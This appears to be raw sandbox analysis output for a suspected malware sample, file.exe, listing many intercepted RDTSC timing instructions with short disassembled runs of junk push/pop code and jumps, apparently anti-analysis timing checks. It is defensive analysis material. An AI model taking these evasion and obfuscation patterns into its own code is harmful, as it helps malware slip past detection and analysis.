Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62F545 second address: 62F555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62A6DD second address: 62A6E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62F555 second address: 62F55B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62A6E1 second address: 62A6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F6E644F7526h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62A6EF second address: 62A705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F6E64DC24BCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6337FA second address: 633805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62F66C second address: 62F715 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D3240h], eax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F6E64DC24B8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov ebx, dword ptr [ebp+122D2987h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007F6E64DC24B8h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 0x00000059 mov ebx, dword ptr [ebp+122D57B3h] 0x0000005f mov eax, dword ptr [ebp+122D0B5Dh] 0x00000065 mov bx, 3634h 0x00000069 push FFFFFFFFh 0x0000006b or bx, 93FEh 0x00000070 nop 0x00000071 jg 00007F6E64DC24C5h 0x00000077 push ecx 0x00000078 jmp 00007F6E64DC24BDh 0x0000007d pop ecx 0x0000007e push eax 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 jmp 00007F6E64DC24C3h 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6307A1 second address: 6307B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62F715 second address: 62F73F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6E64DC24BEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6307B7 second address: 6307C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 633E4C second address: 633EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jbe 00007F6E64DC24B6h 0x0000000d pop edi 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F6E64DC24B8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov di, 6D90h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F6E64DC24B8h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D1B37h], edi 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D5826h], ecx 0x00000058 push eax 0x00000059 push esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 633EB4 second address: 633EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 633EB8 second address: 633EBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 634F90 second address: 634F94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 634F94 second address: 634F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 634F9A second address: 63500A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007F6E644F7537h 0x0000000f nop 0x00000010 xor edi, dword ptr [ebp+122D2C1Dh] 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 mov di, BE5Bh 0x0000001d pop edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F6E644F7528h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a call 00007F6E644F752Ch 0x0000003f mov ebx, 5BF8D370h 0x00000044 pop edi 0x00000045 mov bx, cx 0x00000048 push eax 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jng 00007F6E644F7526h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 636231 second address: 63623F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6E64DC24BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63A24E second address: 63A254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63A254 second address: 63A258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63B324 second address: 63B329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63B329 second address: 63B344 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E64DC24BCh 0x00000008 jns 00007F6E64DC24B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F6E64DC24B8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63B344 second address: 63B349 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63B3D1 second address: 63B3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63E386 second address: 63E38A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63E38A second address: 63E390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 638210 second address: 638216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63E5B2 second address: 63E5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 648A4F second address: 648A65 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6E644F7526h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F6E644F7526h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 648A65 second address: 648A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0CB3 second address: 5E0CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0CB9 second address: 5E0CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F6E64DC24CEh 0x0000000b jmp 00007F6E64DC24C8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 648175 second address: 648179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6482D4 second address: 6482E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F6E64DC24B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 648447 second address: 648451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 648594 second address: 6485BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24C6h 0x00000009 jnl 00007F6E64DC24B6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F6E64DC24B6h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC7B7 second address: 5EC7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F752Dh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC7CC second address: 5EC7D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC7D1 second address: 5EC7FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7533h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6E644F7536h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EC7FE second address: 5EC802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E92E0 second address: 5E92E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E92E4 second address: 5E92E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E92E9 second address: 5E92EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E92EF second address: 5E92F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 653A8C second address: 653A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 ja 00007F6E644F7526h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 653A99 second address: 653AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F6E64DC24B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 653AA6 second address: 653AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 653AAA second address: 653ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6E64DC24C7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 653ACD second address: 653AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F7532h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 653AE5 second address: 653AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 653DF1 second address: 653E0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6E644F7530h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 653E0C second address: 653E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 654211 second address: 654242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7536h 0x00000009 jmp 00007F6E644F7536h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 654242 second address: 654268 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E64DC24C7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F6E64DC24B6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 658AA9 second address: 658AB7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 658AB7 second address: 658AC1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E64DC24B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 658AC1 second address: 658AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 658D9D second address: 658DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 658ED0 second address: 658EDA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 659314 second address: 65931A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65931A second address: 65931E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65931E second address: 659350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F6E64DC24B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6E64DC24BEh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6E64DC24C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6594EB second address: 6594F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F6E644F7526h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6597C2 second address: 6597C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 664C00 second address: 664C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6E644F7526h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 664C0F second address: 664C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 664C13 second address: 664C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62C7A1 second address: 62C7B3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62C7B3 second address: 62C7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62C7B7 second address: 62C7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62C7BD second address: 62C7C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CA02 second address: 62CA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CB7F second address: 62CB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CB83 second address: 62CBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F6E64DC24BDh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CBA1 second address: 62CBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CBA5 second address: 62CBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F6E64DC24C6h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CBCD second address: 62CBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CBD1 second address: 62CC5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F6E64DC24C0h 0x00000010 pop eax 0x00000011 adc ecx, 771EB81Eh 0x00000017 mov edx, dword ptr [ebp+122D2C25h] 0x0000001d call 00007F6E64DC24B9h 0x00000022 pushad 0x00000023 jp 00007F6E64DC24BCh 0x00000029 jns 00007F6E64DC24BCh 0x0000002f popad 0x00000030 push eax 0x00000031 pushad 0x00000032 push ecx 0x00000033 jo 00007F6E64DC24B6h 0x00000039 pop ecx 0x0000003a jg 00007F6E64DC24B8h 0x00000040 popad 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 jmp 00007F6E64DC24C0h 0x0000004a mov eax, dword ptr [eax] 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F6E64DC24C4h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CC5D second address: 62CC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CC63 second address: 62CC89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jl 00007F6E64DC24B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CC89 second address: 62CC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CC92 second address: 62CC96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CE72 second address: 62CEB3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pushad 0x00000012 jbe 00007F6E644F7526h 0x00000018 jmp 00007F6E644F752Bh 0x0000001d popad 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 xor edx, dword ptr [ebp+122D2470h] 0x00000026 nop 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007F6E644F7530h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62D933 second address: 62D939 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62D939 second address: 62D977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F6E644F7531h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov edx, ebx 0x00000010 lea eax, dword ptr [ebp+1248C2BDh] 0x00000016 mov edi, dword ptr [ebp+124500DAh] 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6E644F7533h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E434A second address: 5E434E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 663E0B second address: 663E16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6640C8 second address: 6640CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6640CF second address: 6640EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F6E644F7526h 0x0000000a jmp 00007F6E644F7532h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6640EB second address: 6640EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 664365 second address: 66436F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6644DE second address: 6644E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
